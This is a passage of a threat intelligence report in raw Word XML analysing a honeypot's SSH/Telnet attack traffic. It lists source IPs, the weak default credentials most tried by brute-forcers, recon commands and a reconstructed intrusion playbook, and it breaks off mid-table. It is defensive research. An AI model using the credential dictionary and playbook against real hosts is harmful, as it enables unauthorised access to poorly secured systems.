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A2744"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">THREAT INTELLIGENCE REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="18" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5C8A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH/Telnet Honeypot — 15-Day Deployment Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adversary behaviour, credential intelligence, and malware triage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sensor platform:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie medium-interaction honeypot (Debian VPS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Collection window:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10 — 24 June 2026 (≈15 days)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Report date:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">25 June 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TLP:CLEAR — suitable for public portfolio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Author:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Miguel Marín Simón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t xml:space="preserve">A medium-interaction SSH and Telnet honeypot was deployed on an internet-facing Debian VPS and left in monitored operation for roughly fifteen days. The objective was to observe live, unsolicited attack traffic against a freshly exposed host, characterise the adversaries, and triage any malware delivered to the sensor. No service was advertised; all traffic arrived through opportunistic internet-wide scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within minutes of exposure the sensor began receiving automated login attempts. Over the full window it recorded 335,553 events originating from 879 unique source IP addresses, 39,998 authentication attempts, and 21 distinct malware samples retrieved by attackers after gaining a shell. The captured payloads map to three clearly different threat classes: a self-propagating IRC-controlled botnet worm, the Redtail cryptomining loader, and defensive “cleaner” scripts whose sole purpose is to evict competing malware from the host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The data confirms a well-documented reality of the modern internet: any exposed SSH service is contested infrastructure within minutes, fought over by multiple automated actors simultaneously. The remainder of this report breaks down the telemetry, reconstructs attacker playbooks, and provides a forensic walk-through of the most significant samples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="384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Interpretation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Total events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335,553</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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High-volume automated activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Unique source IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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879</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="384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Broad, distributed origin base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Authentication attempts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39,998</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Credential brute-force at scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Unique sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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42,033</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="384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Mostly short, scripted sessions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Malware samples captured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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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10 ELF binaries + shell loaders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Distinct malware families</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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3+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="384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Botnet worm, cryptominer, cleaners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Most-used credential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 / 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Default/IoT-style weak login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Sensor Architecture &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The sensor is a Cowrie medium-interaction honeypot. Unlike a low-interaction listener that simply records connection attempts, Cowrie emulates a full Linux shell environment. Attackers can “log in”, run commands, and attempt file downloads inside a contained sandbox that never executes their code, while every keystroke, credential, and transferred file is logged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Network Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traffic separation was enforced so that the operator never shared a listening port with adversaries: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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Role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22 / 23</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Exposed to the internet; transparently redirected to Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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2223</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Cowrie listener (emulated shell)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2222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Real administrative SSH, key-based authentication only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inbound port 22/23 traffic is redirected to the Cowrie listener using a NAT prerouting rule, persisted across reboots:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:left w:val="single" w:color="2E5C8A" w:sz="12" w:space="8"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
          <w:right w:val="single" w:color="DDDDDD" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="120" w:before="80" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2223</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables -t nat -A PREROUTING -p tcp --dport 23 -j REDIRECT --to-port 2223</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Operational Hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Real SSH moved off port 22 and restricted to key-based authentication, preventing operator lockout once attack volume ramped up.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cowrie executed under a dedicated, unprivileged service account with no sudo rights.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The honeypot was registered as a systemd service for automatic restart and survival across reboots, avoiding gaps in collection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log rotation was configured to prevent disk exhaustion during high-volume capture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Analysis Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All events are written by Cowrie as line-delimited JSON. A custom Python analyser parses this log to aggregate source IPs, credential pairs, executed commands, client fingerprints, and download events. Captured binaries were triaged against multi-engine antivirus telemetry, and shell-based payloads were read directly for static analysis. The analyser is included in the project repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Volumetric &amp; Source Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 335,553 events were highly concentrated: a small number of source IPs were responsible for a disproportionate share of traffic, a classic signature of dedicated brute-force infrastructure rather than incidental scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Top Source IP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Source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Observation</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176.65.132.24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24,946</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Highest-volume brute-forcer</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176.65.132.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18,258</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Same /24 block — coordinated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179.43.133.154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16,137</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Sustained credential attack</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176.65.132.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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12,473</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Same /24 block — coordinated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45.153.34.112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12,473</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Identical volume — shared tooling</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176.65.132.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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12,172</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Same /24 block — coordinated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45.156.87.253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12,164</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45.156.87.0/24 cluster</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45.156.87.204</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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12,063</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45.156.87.0/24 cluster</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45.153.34.186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7,847</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45.153.34.0/24 cluster</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45.156.87.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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6,387</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45.156.87.0/24 cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst note. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The repeated appearance of the 176.65.132.0/24, 45.156.87.0/24 and 45.153.34.0/24 ranges — several of them producing nearly identical event counts — indicates blocks of rented hosts running the same brute-force toolkit. Identical volumes across different IPs (e.g. 12,473 from two unrelated addresses) strongly suggest a single operator distributing an attack list evenly across a fleet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Geographic &amp; Hosting Context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Spot-checks of source addresses resolved consistently to low-cost hosting and bulletproof-style providers rather than residential networks. Sampled origins included providers hosted in Russia (Moscow) and Germany, alongside the bulk /24 ranges above. This is expected: operators rent disposable VPS capacity to launch attacks, so attribution by geography reflects where infrastructure is cheap and permissive, not where the human operator sits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Credential Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Of 39,998 authentication attempts, the overwhelming majority were accepted by the honeypot by design (Cowrie grants access on a wide range of credentials to observe post-compromise behaviour). The value lies in which credentials attackers chose to try.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Most-Attempted Credential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Username / Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Category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 / 0</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1,791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Default / IoT placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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1234 / 1234</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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338</w:t>
            </w:r>
          </w:p>
        </w:tc>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Trivial numeric</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admin / admin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212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Default appliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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root / (blank)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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128</w:t>
            </w:r>
          </w:p>
        </w:tc>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Privileged, no password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root / admin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105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Privileged guess</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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root / root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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103</w:t>
            </w:r>
          </w:p>
        </w:tc>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Privileged default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ubuntu / ubuntu</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102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Cloud-image default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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root / 123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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81</w:t>
            </w:r>
          </w:p>
        </w:tc>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Privileged + common password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root / 12345</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80</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Privileged + common password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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root / password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Privileged + common password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IoT and appliance focus. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The single most common pair, 0/0, together with admin/admin and numeric passwords, targets routers, cameras and embedded devices shipped with placeholder credentials rather than general-purpose servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege-first strategy. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The root account dominates the password-guessing list, confirming that attackers prioritise immediate administrative control over lower-privilege footholds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud defaults. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ubuntu/ubuntu reflects deliberate targeting of default cloud images, where that account name is standard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve">Defensive takeaway. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Every credential in the top ten is defeated by disabling password authentication, forbidding direct root login, and using key-based access — exactly the configuration applied to the sensor's own administrative port.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Post-Compromise Behaviour</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Across thousands of sessions the post-login behaviour was strikingly uniform, indicating fully automated tooling. The dominant first action was host reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Most-Executed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160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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Purpose</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uname -s -v -n -r -m</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33,971</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OS/kernel fingerprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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/bin/./uname -s -v -n -r -m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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931</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Evasion-style invocation</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export PATH=/usr/local/sbin:...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736</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Normalise environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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uname -m  (arch check)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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736</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CPU architecture</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cat /proc/uptime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736</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Uptime / sandbox check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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MemTotal parsing loop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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296</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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RAM enumeration</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uname -a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87</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Full system string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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59</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Host identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 The Reconnaissance Pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The single command uname -s -v -n -r -m appears nearly 34,000 times. This is the fingerprinting heartbeat of automated loaders: before delivering a payload, the malware identifies the operating system, kernel version and — critically — the CPU architecture, so it can fetch the correctly compiled binary (x86_64, ARM, MIPS, etc.). One sophisticated actor (91.92.40.10) ran a single dense one-liner that enumerated CPU model, core count, GPU, uptime and logged-in users in one pass — hardware profiling consistent with cryptomining viability assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Reconstructed Attacker Playbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Combining the session logs, the typical end-to-end intrusion followed five stages:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Opportunistic SSH brute-force against the exposed port using a weak-credential dictionary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Immediate host fingerprinting via uname to determine OS and CPU architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Environment normalisation (PATH export) and lightweight sandbox/uptime checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload retrieval — download of an architecture-matched binary or a shell loader over wget/curl or SFTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Persistence and propagation — installation of SSH keys or rc.local entries, followed by self-replication or cryptominer deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Client Fingerprints (HASSH)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HASSH fingerprints hash the SSH client's negotiation parameters, allowing distinct tools to be tracked even across changing IPs. One fingerprint accounted for over 34,500 sessions, mirroring the uname volume and confirming that a single client implementation drove the bulk of the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HASSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Sessions</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0a07365cc01fa9fc82608ba4019af499</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34,524</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
